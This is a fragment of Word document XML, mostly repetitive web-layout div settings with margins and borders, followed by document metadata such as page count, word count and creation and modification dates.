              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="17850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607">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1963343607">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="424769817">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="665936172">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1306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8561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="149566279">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1281493432">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1344554614">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1242986028">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="960650196">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="569118767">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1079794055">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1894148955">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="10435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6933">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="198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80277">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="208958930">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="804615700">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="462965682">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="131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4487">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2019042229">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="942153863">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="672496365">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813">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1880505467">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="890925722">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="15243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771">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="403573459">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1294096833">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="823086116">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1649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66">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1671172309">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1079399748">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="14797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41">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="593243375">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2071149942">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1516848737">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16846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3807">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1574120150">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="289897459">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1230000409">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="10606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300">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1346205112">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="513962451">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1528643394">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="172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0499">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="173109256">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="87237650">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="407265050">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="12527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182">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="320040383">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2082680010">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="852189498">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="12126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76">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="60"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1779107647">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713570">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="199853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co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example.com"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ogle.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6583-2FB5-45CF-BB24-B1C676AE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4</TotalTime>
  <Pages>79</Pages>
  <Words>24722</Words>
  <Characters>14091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192</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-19T14:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T03:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>